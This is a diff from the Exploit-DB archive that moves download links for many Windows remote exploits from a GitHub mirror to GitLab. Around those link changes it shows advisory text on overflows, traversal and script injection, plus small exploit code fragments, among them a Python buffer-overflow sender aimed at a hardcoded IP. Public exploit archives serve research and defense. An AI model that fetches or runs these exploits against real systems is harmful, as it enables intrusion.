9405b68d8..3d288cd09 100644 --- a/exploits/windows/remote/22872.txt +++ b/exploits/windows/remote/22872.txt @@ -7,4 +7,4 @@ The issue likely presents itself due do a lack of sufficient bounds checking per It should be noted that although this vulnerability has been reported to affect IglooFTP PRO version 3.8, other versions might also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22872.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22872.zip \ No newline at end of file diff --git a/exploits/windows/remote/22917.txt b/exploits/windows/remote/22917.txt index babef53d7..cf5820055 100644 --- a/exploits/windows/remote/22917.txt +++ b/exploits/windows/remote/22917.txt @@ -6,4 +6,4 @@ This issue may be exposed on other ports that the RPC Endpoint Mapper listens on ** There have been unconfirmed reports that Windows 9x systems with certain software installed may also be vulnerable to this issue. Reportedly, Windows 98 systems with .NET software installed may be vulnerable according to scans using various DCOM RPC vulnerability scanning tools. Symantec has not confirmed this behaviour and it may in fact be due to false positives generated by the scanners. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22917.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22917.zip \ No newline at end of file diff --git a/exploits/windows/remote/22967.txt b/exploits/windows/remote/22967.txt index fa883f7d3..ab1e64cbf 100644 --- a/exploits/windows/remote/22967.txt +++ b/exploits/windows/remote/22967.txt @@ -4,4 +4,4 @@ Half-Life Client has been reported prone to a remotely exploitable buffer overfl The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22967.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22967.zip \ No newline at end of file diff --git a/exploits/windows/remote/23034.txt b/exploits/windows/remote/23034.txt index 4b67248f0..956ee4715 100644 --- a/exploits/windows/remote/23034.txt +++ b/exploits/windows/remote/23034.txt @@ -6,4 +6,4 @@ When the vulnerable configuration is in place, an attacker may be capable of enu The enumeration of this type of information could potentially aid an attacker when launching further attacks against the target web server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23034.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23034.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/23073.txt b/exploits/windows/remote/23073.txt index bee0e46c1..186fed173 100644 --- a/exploits/windows/remote/23073.txt +++ b/exploits/windows/remote/23073.txt @@ -9,7 +9,7 @@ The exploit is mirrored at the farlight website http://www.farlight.org. Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday All owned By Kingcope -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23073.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23073.tar.gz Installation Instructions ============================= diff --git a/exploits/windows/remote/23079.txt b/exploits/windows/remote/23079.txt index da8397805..07d507f4c 100644 --- a/exploits/windows/remote/23079.txt +++ b/exploits/windows/remote/23079.txt @@ -3,7 +3,7 @@ Discovered & Exploited By Kingcope Year 2011 -- -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23079.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23079.zip Example banner: WeOnlyDo-wodFTPD 2.3.6.165 diff --git a/exploits/windows/remote/23080.txt b/exploits/windows/remote/23080.txt index 21ff3d21a..b078612df 100644 --- a/exploits/windows/remote/23080.txt +++ b/exploits/windows/remote/23080.txt @@ -2,7 +2,7 @@ FreeSSHD all version Remote Authentication Bypass ZERODAY Discovered & Exploited by Kingcope Year 2011 -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23080.zip +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23080.zip Run like: diff --git a/exploits/windows/remote/23083.txt b/exploits/windows/remote/23083.txt index 1d69705a5..3f4c92be7 100644 --- a/exploits/windows/remote/23083.txt +++ b/exploits/windows/remote/23083.txt @@ -3,7 +3,7 @@ Version 1.0 By Kingcope In the Year of 2012 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23083.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23083.zip use this on a fast scan server! diff --git a/exploits/windows/remote/23131.txt b/exploits/windows/remote/23131.txt index 8b8c8aaab..c0d12447c 100644 --- a/exploits/windows/remote/23131.txt +++ b/exploits/windows/remote/23131.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/8577/info Multiple issues have been reported in Microsoft Internet Explorer. Though these issues have been reported by a reliable source, communication issues have presented difficulty in obtaining details surrounding the reported issues. This vulnerability entry will be updated when additional information becomes available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23131.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23131.zip \ No newline at end of file diff --git a/exploits/windows/remote/23198.txt b/exploits/windows/remote/23198.txt index 5389cf346..b977ba20e 100644 --- a/exploits/windows/remote/23198.txt +++ b/exploits/windows/remote/23198.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/8730/info It has been reported that Half-Life clients may be prone to a format string vulnerability. The problem occurs when an invalid command is issued to the server, and an error response is returned and displayed by the client. If a format specifier were included within the invalid command, when displaying the error the format specifier would be interperted literally. This could potentially be exploited by a remote attacker to execute arbitrary code with the privileges of the Half-Life client. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23198.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23198.zip \ No newline at end of file diff --git a/exploits/windows/remote/23283.txt b/exploits/windows/remote/23283.txt index 7fa07eaaf..a88b94402 100644 --- a/exploits/windows/remote/23283.txt +++ b/exploits/windows/remote/23283.txt @@ -6,4 +6,4 @@ This could aid in exploitation of other vulnerabilities, such as issues that per Liu Die Yu has released conflicting information that states that this issue occurs because the user is redirected into a local resource and then the local resource is being refreshed. It is reported that other variations such as "file://" or "[DriveLetter]:\[...]" also work with this exploit. This is currently under investigation. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23283.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23283.zip \ No newline at end of file diff --git a/exploits/windows/remote/23340.txt b/exploits/windows/remote/23340.txt index b9f3f82aa..1fcc7a646 100644 --- a/exploits/windows/remote/23340.txt +++ b/exploits/windows/remote/23340.txt @@ -8,6 +8,6 @@ The extra slash prior to "Documents and Settings" will cause the referenced cont ** A new proof-of-concept has been made available which uses the vulnerability described in BID 9106 to locate the Internet Explorer cache. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23340-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23340-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23340-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23340-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/23400.txt b/exploits/windows/remote/23400.txt index 005d8a9b9..0db27c814 100644 --- a/exploits/windows/remote/23400.txt +++ b/exploits/windows/remote/23400.txt @@ -8,4 +8,4 @@ According to Microsoft, Microsoft Internet Explorer on Windows Server 2003 is pr Microsoft Windows platforms running Microsoft Outlook Express 5.5SP2, 6.0, and 6.0SP1 are reported by the vendor to be affected though the issue may also be present in earlier versions of Microsoft Outlook Express. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23400.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23400.zip \ No newline at end of file diff --git a/exploits/windows/remote/23401.txt b/exploits/windows/remote/23401.txt index 47f4dbf1c..04bd1d95b 100644 --- a/exploits/windows/remote/23401.txt +++ b/exploits/windows/remote/23401.txt @@ -8,4 +8,4 @@ According to Microsoft, Microsoft Internet Explorer on Windows Server 2003 is pr Microsoft Windows platforms running Microsoft Outlook Express 5.5SP2, 6.0, and 6.0SP1 are reported by the vendor to be affected though the issue may also be present in earlier versions of Microsoft Outlook Express. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23401.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23401.zip \ No newline at end of file diff --git a/exploits/windows/remote/23423.txt b/exploits/windows/remote/23423.txt index 83a2aca6e..8d78e9b6a 100644 --- a/exploits/windows/remote/23423.txt +++ b/exploits/windows/remote/23423.txt @@ -4,4 +4,4 @@ A weakness has been reported in multiple browsers that may allow attackers to ob An attacker could exploit this issue by supplying a malicious URI pointing to a page designed to mimic that of a trusted site, and tricking a victim who follows a link into believing they are actually at the trusted location. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23423.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23423.zip \ No newline at end of file diff --git a/exploits/windows/remote/23489.txt b/exploits/windows/remote/23489.txt index 654f8a190..67fe41cda 100644 --- a/exploits/windows/remote/23489.txt +++ b/exploits/windows/remote/23489.txt @@ -4,4 +4,4 @@ A vulnerability has been reported to affect Sygate Personal Firewall that may al A local attacker may exploit this condition to bypass Sygate DLL authentication controls. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23489.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23489.zip \ No newline at end of file diff --git a/exploits/windows/remote/23493.txt b/exploits/windows/remote/23493.txt index 9360e0a84..50dffa9ca 100644 --- a/exploits/windows/remote/23493.txt +++ b/exploits/windows/remote/23493.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9316/info Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive length is supplied to the Telnet server. Due to a lack of bounds checking, when this username is copied into an insufficient reserved buffer in stack-based memory, data that exceeds the size of the buffer will overrun its bounds and corrupt adjacent memory. An attacker may exploit this condition to corrupt a saved instruction pointer for the vulnerable function. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23493.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23493.zip \ No newline at end of file diff --git a/exploits/windows/remote/23734.c b/exploits/windows/remote/23734.c index 79b0228d6..0e64071f2 100644 --- a/exploits/windows/remote/23734.c +++ b/exploits/windows/remote/23734.c @@ -141,6 +141,4 @@ int main( int argc, char *argv[] ) return(0); -} - - +} \ No newline at end of file diff --git a/exploits/windows/remote/23758.txt b/exploits/windows/remote/23758.txt index 63e4a177f..846a13b53 100644 --- a/exploits/windows/remote/23758.txt +++ b/exploits/windows/remote/23758.txt @@ -4,4 +4,4 @@ It has been reported that GWeb is prone to a directory traversal vulnerability. This issue may allow an attacker to escape the web server root directory and view any web server readable files. Information acquired by exploiting this issue may be used to aid further attacks against a vulnerable system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23758.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23758.zip \ No newline at end of file diff --git a/exploits/windows/remote/24017.html b/exploits/windows/remote/24017.html index 3140f57a6..b24e33e6c 100644 --- a/exploits/windows/remote/24017.html +++ b/exploits/windows/remote/24017.html @@ -11,7 +11,7 @@ ** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb ** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 -** Old version of the exploit available at: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24017-old.zip +** Old version of the exploit available at: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24017-old.zip #################################################################### diff --git a/exploits/windows/remote/24125.txt b/exploits/windows/remote/24125.txt index 8d1df6097..3a4a796bb 100644 --- a/exploits/windows/remote/24125.txt +++ b/exploits/windows/remote/24125.txt @@ -6,4 +6,4 @@ This vulnerability poses a security risk since users assume that opening a folde The reporter of this issue has provided a proof-of-concept exploit that executes NetMeeting and installs a keylogger on a vulnerable system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24125.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24125.zip \ No newline at end of file diff --git a/exploits/windows/remote/24653.txt b/exploits/windows/remote/24653.txt index fdad98722..d9e2d5d05 100644 --- a/exploits/windows/remote/24653.txt +++ b/exploits/windows/remote/24653.txt @@ -4,4 +4,4 @@ VyPRESS Messenger is affected by a remote buffer overflow vulnerability. This is An attacker may leverage this issue to remotely execute arbitrary machine code on an affected computer with the privileges of the user running the affected application. It is possible to exploit all hosts on a local area network by sending a message to a broadcast address. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24653.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24653.zip \ No newline at end of file diff --git a/exploits/windows/remote/24693.txt b/exploits/windows/remote/24693.txt index b1a4ca6b0..1c094a00a 100644 --- a/exploits/windows/remote/24693.txt +++ b/exploits/windows/remote/24693.txt @@ -4,4 +4,4 @@ The Microsoft cumulative Internet Explorer patch (MS04-038) attempted to limit w However, a number of file types are still permitted for drag and drop operations. It has demonstrated that it is possible to embed hostile HTML and script code in one of these file types, remove the file extension and then allow the operating system to dynamically determine the file type based on its contents. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24693.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24693.zip \ No newline at end of file diff --git a/exploits/windows/remote/24767.txt b/exploits/windows/remote/24767.txt index 607dc573f..afac963bb 100644 --- a/exploits/windows/remote/24767.txt +++ b/exploits/windows/remote/24767.txt @@ -4,4 +4,4 @@ It is reported that Soldier of Fortune 2 is susceptible to a buffer overflow vul A remote attacker may exploit this vulnerability to deny service to legitimate users. Due to the nature of this vulnerability, it is conjectured that remote code execution may be possible, but this is not confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24767.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24767.zip \ No newline at end of file diff --git a/exploits/windows/remote/24958.py b/exploits/windows/remote/24958.py index bf90a543b..f6383d9cd 100755 --- a/exploits/windows/remote/24958.py +++ b/exploits/windows/remote/24958.py @@ -40,4 +40,4 @@ buf = "GET /" + junk + ret + " HTTP/1.1\r\n" + "Host: " + host + "\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.37.132", 8080)) -s.send(buf) +s.send(buf) \ No newline at end of file diff --git a/exploits/windows/remote/25016.txt b/exploits/windows/remote/25016.txt index 3911c0d62..289dc8ac0 100644 --- a/exploits/windows/remote/25016.txt +++ b/exploits/windows/remote/25016.txt @@ -4,4 +4,4 @@ asp2php is prone to a buffer overflow vulnerability. This issue is exposed when Successful exploitation would allow for execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25016.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25016.zip \ No newline at end of file diff --git a/exploits/windows/remote/25020.txt b/exploits/windows/remote/25020.txt index 025e9e027..b96835f81 100644 --- a/exploits/windows/remote/25020.txt +++ b/exploits/windows/remote/25020.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through the application, the attack VB2C version 0.02 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25020.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25020.zip \ No newline at end of file diff --git a/exploits/windows/remote/25021.txt b/exploits/windows/remote/25021.txt index 620e26b23..99518c9a4 100644 --- a/exploits/windows/remote/25021.txt +++ b/exploits/windows/remote/25021.txt @@ -4,4 +4,4 @@ abcpp is prone to a buffer overflow vulnerability. This issue is exposed when th Successful exploitation will result in execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25021.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25021.zip \ No newline at end of file diff --git a/exploits/windows/remote/25022.txt b/exploits/windows/remote/25022.txt index 9061f7d98..5a1357100 100644 --- a/exploits/windows/remote/25022.txt +++ b/exploits/windows/remote/25022.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through the application, the attack abcm2ps version 3.7.20 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25022.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25022.zip \ No newline at end of file diff --git a/exploits/windows/remote/25023.txt b/exploits/windows/remote/25023.txt index c8b6b1447..31e01ee89 100644 --- a/exploits/windows/remote/25023.txt +++ b/exploits/windows/remote/25023.txt @@ -4,4 +4,4 @@ It is reported that pgn2web is susceptible to a buffer overflow vulnerability. T This vulnerability allow remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read malicious PGN files. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25023.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25023.zip \ No newline at end of file diff --git a/exploits/windows/remote/25025.txt b/exploits/windows/remote/25025.txt index 30b1359fd..a06664d0b 100644 --- a/exploits/windows/remote/25025.txt +++ b/exploits/windows/remote/25025.txt @@ -4,4 +4,4 @@ abc2ps and jcabc2ps are prone to a buffer overflow vulnerability. This issue is Successful exploitation will result in execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25025.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25025.zip \ No newline at end of file diff --git a/exploits/windows/remote/25026.txt b/exploits/windows/remote/25026.txt index 055bd730d..5c5870a41 100644 --- a/exploits/windows/remote/25026.txt +++ b/exploits/windows/remote/25026.txt @@ -4,4 +4,4 @@ It is reported that Mesh Viewer is susceptible to a buffer overflow vulnerabilit This vulnerability allow remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read malicious files. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25026.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25026.zip \ No newline at end of file diff --git a/exploits/windows/remote/25027.txt b/exploits/windows/remote/25027.txt index 4f109f3b7..9ff523a4d 100644 --- a/exploits/windows/remote/25027.txt +++ b/exploits/windows/remote/25027.txt @@ -10,4 +10,4 @@ If a user obtains this file and processes it through the application, the attack abctab2ps version 1.6.3 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25027.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25027.zip \ No newline at end of file diff --git a/exploits/windows/remote/25029.txt b/exploits/windows/remote/25029.txt index 1e30752c0..5ed1c4f62 100644 --- a/exploits/windows/remote/25029.txt +++ b/exploits/windows/remote/25029.txt @@ -10,4 +10,4 @@ If a user obtains this file and processes it through the application, the attack abctab2ps version 1.6.3 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25029.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25029.zip \ No newline at end of file diff --git a/exploits/windows/remote/25033.txt b/exploits/windows/remote/25033.txt index b292e8260..ba7e35396 100644 --- a/exploits/windows/remote/25033.txt +++ b/exploits/windows/remote/25033.txt @@ -4,4 +4,4 @@ greed (Get and Resume Elite Edition) is prone to a buffer overflow vulnerability Successful exploitation will result in execution of arbitrary code in the context of the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25033.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25033.zip \ No newline at end of file diff --git a/exploits/windows/remote/25034.txt b/exploits/windows/remote/25034.txt index 0b42994cf..cea2422a1 100644 --- a/exploits/windows/remote/25034.txt +++ b/exploits/windows/remote/25034.txt @@ -4,4 +4,4 @@ greed (Get and Resume Elite Edition) is prone to unauthorized command execution. Successful exploitation will result in command execution in the context of the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25034.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25034.zip \ No newline at end of file diff --git a/exploits/windows/remote/25049.txt b/exploits/windows/remote/25049.txt index 9558b24a4..cfb6d5ce0 100644 --- a/exploits/windows/remote/25049.txt +++ b/exploits/windows/remote/25049.txt @@ -4,4 +4,4 @@ Microsoft Windows is prone to an integer overflow vulnerability. This issue exis Successful exploitation may allow execution of arbitrary code in the context of the user that opens the malicious Help file. The Help file may originate from an external or untrusted source, so this vulnerability is considered remote in nature. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25049.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25049.gz \ No newline at end of file diff --git a/exploits/windows/remote/25050.txt b/exploits/windows/remote/25050.txt index d99b1ecbf..fd7f1ae50 100644 --- a/exploits/windows/remote/25050.txt +++ b/exploits/windows/remote/25050.txt @@ -4,4 +4,4 @@ Microsoft Windows is prone to a heap-based buffer overflow vulnerability. This i Successful exploitation may allow execution of arbitrary code in the context of the user that opens the malicious Help file. The Help file may originate from an external or untrusted source, so this vulnerability is considered remote in nature. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25050.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25050.gz \ No newline at end of file diff --git a/exploits/windows/remote/25057.txt b/exploits/windows/remote/25057.txt index c98158745..2bc8cfaf3 100644 --- a/exploits/windows/remote/25057.txt +++ b/exploits/windows/remote/25057.txt @@ -4,4 +4,4 @@ DivX Player is reported prone to a directory traversal vulnerability. The issue Ultimately an attacker may exploit this issue to save a script or executable file in an arbitrary location. This may lead to the execution of malicious code when the affected system is restarted. Alternatively, the attacker may overwrite a target file with the privileges of a user that is installing a malicious skin file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25057.dps \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25057.dps \ No newline at end of file diff --git a/exploits/windows/remote/25196.txt b/exploits/windows/remote/25196.txt index 3140bdd20..53a3e70b5 100644 --- a/exploits/windows/remote/25196.txt +++ b/exploits/windows/remote/25196.txt @@ -6,4 +6,4 @@ It is likely that the attacker must be in the contact list of an unsuspecting us An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25196.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25196.zip \ No newline at end of file diff --git a/exploits/windows/remote/25386.txt b/exploits/windows/remote/25386.txt index e621aa41a..4e8e34dd6 100644 --- a/exploits/windows/remote/25386.txt +++ b/exploits/windows/remote/25386.txt @@ -4,4 +4,4 @@ A vulnerability in Microsoft Internet Explorer may allow remote attackers to exe This issue presents itself the affected application attempts to process certain script objects, a race condition may lead to the execution of attacker-supplied code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25386.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25386.zip \ No newline at end of file diff --git a/exploits/windows/remote/25454.txt b/exploits/windows/remote/25454.txt index 6640d074b..dce76b437 100644 --- a/exploits/windows/remote/25454.txt +++ b/exploits/windows/remote/25454.txt @@ -2,8 +2,8 @@ source: https://www.securityfocus.com/bid/13248/info Microsoft Windows Explorer is prone to a script injection vulnerability. This occurs when the Windows Explorer preview pane (Web View) is enabled on Windows 2000 computers. Windows 98/98SE/ME are also affected by this issue. If a file with malicious attributes is selected using Explorer, script code contained in the attribute fields may be executed with the privilege level of the user that invoked Explorer. This could be exploited to gain unauthorized access to the vulnerable computer in the context of the currently logged in user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25454-1.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25454-1.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25454-2.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25454-2.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25454-3.doc \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25454-3.doc \ No newline at end of file diff --git a/exploits/windows/remote/25989.txt b/exploits/windows/remote/25989.txt index ea78613ed..b0fb59627 100644 --- a/exploits/windows/remote/25989.txt +++ b/exploits/windows/remote/25989.txt @@ -8,4 +8,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges Versions 5.03a, 5.09, and 5.091 are reported vulnerable to this issue. Other versions are also likely affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25989.mp3 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25989.mp3 \ No newline at end of file diff --git a/exploits/windows/remote/27073.txt b/exploits/windows/remote/27073.txt index 8f40973be..3dbbd01b6 100644 --- a/exploits/windows/remote/27073.txt +++ b/exploits/windows/remote/27073.txt @@ -8,4 +8,4 @@ This vulnerability may be remotely exploited due to project files originating fr Visual Studio 2005 is reportedly vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27073.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27073.zip \ No newline at end of file diff --git a/exploits/windows/remote/27526.txt b/exploits/windows/remote/27526.txt index 2525bd2ca..6282aac09 100644 --- a/exploits/windows/remote/27526.txt +++ b/exploits/windows/remote/27526.txt @@ -47,7 +47,7 @@ a malicious page or open a malicious file. The full exploit code that pops calc.exe is available here: http://packetstormsecurity.com/files/122777/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27526.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27526.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/27569.txt b/exploits/windows/remote/27569.txt index e4b221711..59ca2c8ed 100644 --- a/exploits/windows/remote/27569.txt +++ b/exploits/windows/remote/27569.txt @@ -4,4 +4,4 @@ UltraVNC is susceptible to multiple error-logging remote buffer-overflow vulnera A successful attack may allow remote attackers to execute arbitrary code on a vulnerable computer to gain unauthorized access in the context of the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27569.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27569.zip \ No newline at end of file diff --git a/exploits/windows/remote/27611.txt b/exploits/windows/remote/27611.txt index 7c76f7bb3..bf8198d3b 100644 --- a/exploits/windows/remote/27611.txt +++ b/exploits/windows/remote/27611.txt @@ -47,7 +47,7 @@ must visit a malicious page or open a malicious file. The full exploit code that pops calc.exe is available here: http://packetstormsecurity.com/files/122806/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27611.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27611.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/windows/remote/27746.txt b/exploits/windows/remote/27746.txt index b6290dff4..e96cc1e5f 100644 --- a/exploits/windows/remote/27746.txt +++ b/exploits/windows/remote/27746.txt @@ -6,4 +6,4 @@ A successful attack can allow the attacker to place potentially malicious files This issue affects WinISO version 5.3; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27746.iso.bin \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27746.iso.bin \ No newline at end of file diff --git a/exploits/windows/remote/27754.txt b/exploits/windows/remote/27754.txt index 0308bf50a..87a8336d5 100644 --- a/exploits/windows/remote/27754.txt +++ b/exploits/windows/remote/27754.txt @@ -46,7 +46,7 @@ must visit a malicious page or open a malicious file. The full exploit code that pops calc.exe is available here: 